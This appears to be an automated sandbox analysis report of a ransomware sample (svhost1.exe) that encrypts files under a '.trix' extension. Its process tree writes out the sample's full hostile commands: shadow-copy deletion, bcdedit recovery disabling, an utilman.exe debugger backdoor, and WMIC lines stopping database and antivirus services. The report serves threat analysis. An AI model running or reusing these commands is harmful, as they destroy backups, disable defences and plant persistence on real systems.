1872 WMIC.exe Token: SeIncreaseQuotaPrivilege 1872 WMIC.exe Token: SeSecurityPrivilege 1872 WMIC.exe Token: SeTakeOwnershipPrivilege 1872 WMIC.exe Token: SeLoadDriverPrivilege 1872 WMIC.exe Token: SeSystemProfilePrivilege 1872 WMIC.exe Token: SeSystemtimePrivilege 1872 WMIC.exe Token: SeProfSingleProcessPrivilege 1872 WMIC.exe Token: SeIncBasePriorityPrivilege 1872 WMIC.exe Token: SeCreatePagefilePrivilege 1872 WMIC.exe Token: SeBackupPrivilege 1872 WMIC.exe Token: SeRestorePrivilege 1872 WMIC.exe Token: SeShutdownPrivilege 1872 WMIC.exe Token: SeDebugPrivilege 1872 WMIC.exe Token: SeSystemEnvironmentPrivilege 1872 WMIC.exe Token: SeRemoteShutdownPrivilege 1872 WMIC.exe Token: SeUndockPrivilege 1872 WMIC.exe Token: SeManageVolumePrivilege 1872 WMIC.exe Token: 33 1872 WMIC.exe Token: 34 1872 WMIC.exe Token: 35 1872 WMIC.exe Token: 36 1872 WMIC.exe Token: SeIncreaseQuotaPrivilege 3084 WMIC.exe Token: SeSecurityPrivilege 3084 WMIC.exe Token: SeTakeOwnershipPrivilege 3084 WMIC.exe Token: SeLoadDriverPrivilege 3084 WMIC.exe Token: SeSystemProfilePrivilege 3084 WMIC.exe Token: SeSystemtimePrivilege 3084 WMIC.exe Token: SeProfSingleProcessPrivilege 3084 WMIC.exe Token: SeIncBasePriorityPrivilege 3084 WMIC.exe Token: SeCreatePagefilePrivilege 3084 WMIC.exe Token: SeBackupPrivilege 3084 WMIC.exe Token: SeRestorePrivilege 3084 WMIC.exe Token: SeShutdownPrivilege 3084 WMIC.exe Token: SeDebugPrivilege 3084 WMIC.exe Token: SeSystemEnvironmentPrivilege 3084 WMIC.exe Token: SeRemoteShutdownPrivilege 3084 WMIC.exe Token: SeUndockPrivilege 3084 WMIC.exe Token: SeManageVolumePrivilege 3084 WMIC.exe Token: 33 3084 WMIC.exe Token: 34 3084 WMIC.exe Token: 35 3084 WMIC.exe Token: 36 3084 WMIC.exe Token: SeIncreaseQuotaPrivilege 3084 WMIC.exe Token: SeSecurityPrivilege 3084 WMIC.exe Token: SeTakeOwnershipPrivilege 3084 WMIC.exe Token: SeLoadDriverPrivilege 3084 WMIC.exe Token: SeSystemProfilePrivilege 3084 WMIC.exe Token: SeSystemtimePrivilege 3084 WMIC.exe Token: 
SeProfSingleProcessPrivilege 3084 WMIC.exe Token: SeIncBasePriorityPrivilege 3084 WMIC.exe Token: SeCreatePagefilePrivilege 3084 WMIC.exe Token: SeBackupPrivilege 3084 WMIC.exe Token: SeRestorePrivilege 3084 WMIC.exe Token: SeShutdownPrivilege 3084 WMIC.exe Token: SeDebugPrivilege 3084 WMIC.exe Token: SeSystemEnvironmentPrivilege 3084 WMIC.exe Token: SeRemoteShutdownPrivilege 3084 WMIC.exe Token: SeUndockPrivilege 3084 WMIC.exe Token: SeManageVolumePrivilege 3084 WMIC.exe Token: 33 3084 WMIC.exe Token: 34 3084 WMIC.exe Token: 35 3084 WMIC.exe Token: 36 3084 WMIC.exe Token: SeIncreaseQuotaPrivilege 3132 WMIC.exe Token: SeSecurityPrivilege 3132 WMIC.exe Token: SeTakeOwnershipPrivilege 3132 WMIC.exe Token: SeLoadDriverPrivilege 3132 WMIC.exe Token: SeSystemProfilePrivilege 3132 WMIC.exe Token: SeSystemtimePrivilege 3132 WMIC.exe Token: SeProfSingleProcessPrivilege 3132 WMIC.exe Token: SeIncBasePriorityPrivilege 3132 WMIC.exe Token: SeCreatePagefilePrivilege 3132 WMIC.exe Token: SeBackupPrivilege 3132 WMIC.exe Token: SeRestorePrivilege 3132 WMIC.exe Token: SeShutdownPrivilege 3132 WMIC.exe Token: SeDebugPrivilege 3132 WMIC.exe Token: SeSystemEnvironmentPrivilege 3132 WMIC.exe Token: SeRemoteShutdownPrivilege 3132 WMIC.exe Token: SeUndockPrivilege 3132 WMIC.exe Token: SeManageVolumePrivilege 3132 WMIC.exe Token: 33 3132 WMIC.exe Token: 34 3132 WMIC.exe Token: 35 3132 WMIC.exe Token: 36 3132 WMIC.exe Token: SeIncreaseQuotaPrivilege 3132 WMIC.exe Token: SeSecurityPrivilege 3132 WMIC.exe Token: SeTakeOwnershipPrivilege 3132 WMIC.exe Token: SeLoadDriverPrivilege 3132 WMIC.exe Token: SeSystemProfilePrivilege 3132 WMIC.exe Token: SeSystemtimePrivilege 3132 WMIC.exe Token: SeProfSingleProcessPrivilege 3132 WMIC.exe Token: SeIncBasePriorityPrivilege 3132 WMIC.exe Token: SeCreatePagefilePrivilege 3132 WMIC.exe Token: SeBackupPrivilege 3132 WMIC.exe Token: SeRestorePrivilege 3132 WMIC.exe Token: SeShutdownPrivilege 3132 WMIC.exe Token: SeDebugPrivilege 3132 WMIC.exe Token: 
SeSystemEnvironmentPrivilege 3132 WMIC.exe Token: SeRemoteShutdownPrivilege 3132 WMIC.exe Token: SeUndockPrivilege 3132 WMIC.exe Token: SeManageVolumePrivilege 3132 WMIC.exe Token: 33 3132 WMIC.exe Token: 34 3132 WMIC.exe Token: 35 3132 WMIC.exe Token: 36 3132 WMIC.exe Token: SeIncreaseQuotaPrivilege 2252 WMIC.exe Token: SeSecurityPrivilege 2252 WMIC.exe Token: SeTakeOwnershipPrivilege 2252 WMIC.exe Token: SeLoadDriverPrivilege 2252 WMIC.exe Token: SeSystemProfilePrivilege 2252 WMIC.exe Token: SeSystemtimePrivilege 2252 WMIC.exe Token: SeProfSingleProcessPrivilege 2252 WMIC.exe Token: SeIncBasePriorityPrivilege 2252 WMIC.exe Token: SeCreatePagefilePrivilege 2252 WMIC.exe Token: SeBackupPrivilege 2252 WMIC.exe Token: SeRestorePrivilege 2252 WMIC.exe Token: SeShutdownPrivilege 2252 WMIC.exe Token: SeDebugPrivilege 2252 WMIC.exe Token: SeSystemEnvironmentPrivilege 2252 WMIC.exe Token: SeRemoteShutdownPrivilege 2252 WMIC.exe Token: SeUndockPrivilege 2252 WMIC.exe Token: SeManageVolumePrivilege 2252 WMIC.exe Token: 33 2252 WMIC.exe Token: 34 2252 WMIC.exe Token: 35 2252 WMIC.exe Token: 36 2252 WMIC.exe Token: SeIncreaseQuotaPrivilege 2252 WMIC.exe Token: SeSecurityPrivilege 2252 WMIC.exe Token: SeTakeOwnershipPrivilege 2252 WMIC.exe Token: SeLoadDriverPrivilege 2252 WMIC.exe Token: SeSystemProfilePrivilege 2252 WMIC.exe Token: SeSystemtimePrivilege 2252 WMIC.exe Token: SeProfSingleProcessPrivilege 2252 WMIC.exe Token: SeIncBasePriorityPrivilege 2252 WMIC.exe Token: SeCreatePagefilePrivilege 2252 WMIC.exe Token: SeBackupPrivilege 2252 WMIC.exe Token: SeRestorePrivilege 2252 WMIC.exe Token: SeShutdownPrivilege 2252 WMIC.exe Token: SeDebugPrivilege 2252 WMIC.exe Token: SeSystemEnvironmentPrivilege 2252 WMIC.exe Token: SeRemoteShutdownPrivilege 2252 WMIC.exe Token: SeUndockPrivilege 2252 WMIC.exe Token: SeManageVolumePrivilege 2252 WMIC.exe Token: 33 2252 WMIC.exe Token: 34 2252 WMIC.exe Token: 35 2252 WMIC.exe Token: 36 2252 WMIC.exe Token: SeIncreaseQuotaPrivilege 3444 
-
Drops file in Windows directory 44 IoCs
-
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process
1080 net.exe
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process
408 bcdedit.exe
1060 bcdedit.exe
-
Modifies service 2 TTPs 5 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe
-
Drops file in Program Files directory 346 IoCs
Files\AssertConnect.bmp_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Microsoft Office\FileSystemMetadata.xml svhost1.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll svhost1.exe File created C:\Program Files\Windows Defender\ProtectionManagement.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Windows Defender\SymSrv.yes_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\SymSrv.yes svhost1.exe File opened for modification C:\Program Files\GetDeny.wpl svhost1.exe File created C:\Program Files\ReceiveConfirm.temp_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files (x86)\desktop.ini_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\ieinstal.exe_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Windows Media Player\wmprph.exe svhost1.exe File created C:\Program Files\Windows Defender\MpClient.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-string-l1-1-0.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\mozavcodec.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\ucrtbase.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\xul.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Windows Defender\MsMpResL.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification 
C:\Program Files\ConvertFromClose.docx svhost1.exe File created C:\Program Files\GetDeny.wpl_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\ImportGet.eps svhost1.exe File opened for modification C:\Program Files\InvokeResize.asp svhost1.exe File opened for modification C:\Program Files\Windows Media Player\wmplayer.exe svhost1.exe File created C:\Program Files\Windows Defender\AmStatusInstall.mof_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Windows Defender\MpAsDesc.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\NisSrv.exe svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-convert-l1-1-0.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-utility-l1-1-0.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\vcruntime140.dll svhost1.exe File created C:\Program Files\RequestPing.jpeg_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\IEShims.dll svhost1.exe File created C:\Program Files\Windows Defender\NisLog.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Windows Defender\ProtectionManagement_Uninstall.mof_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\7-Zip\7zCon.sfx_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\7-Zip\History.txt svhost1.exe File created C:\Program Files\Mozilla Firefox\updater.ini_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\AccessibleMarshal.dll svhost1.exe File opened for modification C:\Program Files\Mozilla 
Firefox\api-ms-win-crt-stdio-l1-1-0.dll svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\IA2Marshal.dll svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\qipcap64.dll svhost1.exe File opened for modification C:\Program Files\AssertConnect.bmp svhost1.exe File opened for modification C:\Program Files\SaveDismount.wps svhost1.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll svhost1.exe File created C:\Program Files\Windows Defender\Defendericon.png_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\mozglue.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\msvcp140.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\InvokeRevoke.xltx_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Windows Defender\ClientWMIInstall.mof_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\firefox.exe.sig_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\plugin-container.exe_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe svhost1.exe File created C:\Program Files\ConvertFromClose.docx_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Windows Defender\MpCmdRun.exe_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\7-Zip\7-zip.chm_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\7-Zip\License.txt_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-stdio-l1-1-0.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla 
Firefox\mozglue.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\updater.exe_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\LockTest.nfo_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\SuspendRevoke.dotm_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\ielowutil.exe_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Windows Media Player\wmpconfig.exe svhost1.exe File created C:\Program Files\Mozilla Firefox\libGLESv2.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\minidump-analyzer.exe_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\nss3.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\pingsender.exe_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\CompareDismount.jfif_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\ReceiveSend.3gpp_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Windows Media Player\mpvis.DLL svhost1.exe File opened for modification C:\Program Files\Windows Defender\AMMonitoringProvider.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-math-l1-1-0.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\mozavutil.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ielowutil.exe svhost1.exe File created C:\Program Files\Windows 
Defender\DefenderCSP.dll_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\7-Zip\7zG.exe_ID_625234068_[[email protected]].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-environment-l1-1-0.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\softokn3.dll svhost1.exe File created C:\Program Files\CompleteReset.emf_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\RequestPing.jpeg svhost1.exe File created C:\Program Files\Internet Explorer\hmmapi.dll_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll svhost1.exe File opened for modification C:\Program Files\Windows Defender\ProtectionManagement_Uninstall.mof svhost1.exe File created C:\Program Files\7-Zip\7z.sfx_ID_625234068_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe svhost1.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\svhost1.exe (PID 664)
  Command line: "C:\Users\Admin\AppData\Local\Temp\svhost1.exe"
  Signatures: Suspicious use of WriteProcessMemory; Drops desktop.ini file(s); Drops file in Windows directory; Drops file in Program Files directory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 868)
    Command line: powershell.exe -NoExit -Command -
    Signatures: Suspicious use of WriteProcessMemory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\net.exe (PID 1080)
      Command line: "C:\Windows\system32\net.exe" view
      Signatures: Discovers systems in the same network
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2092)
    Command line: powershell.exe -NoExit -Command -
    Signatures: Suspicious use of WriteProcessMemory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3712)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\vssadmin.exe (PID 3180)
      Command line: "C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet
      Signatures: Interacts with shadow copies
    - C:\Windows\system32\reg.exe (PID 1872)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe
      Signatures: Sets file execution options in registry
    - C:\Windows\system32\reg.exe (PID 1912)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"
      Signatures: Sets file execution options in registry
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3528)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3328)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2272)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 496)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3648)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3800)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1080)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2860)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 732)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2108)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3552)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 276)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3888)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3540)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1836)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2252)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3052)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 508)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3996)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3992)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2220)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 992)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1060)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1800)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1008)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 268)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3848)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1476)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1872)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3084)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3132)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2252)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3444)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 508)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3996)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3992)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1068)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1252)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate
    - C:\Windows\system32\bcdedit.exe (PID 408)
      Command line: "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text
      Signatures: Modifies boot configuration data using bcdedit
    - C:\Windows\system32\bcdedit.exe (PID 1060)
      Command line: "C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text
      Signatures: Modifies boot configuration data using bcdedit
- C:\Windows\system32\vssvc.exe (PID 3340)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken; Modifies service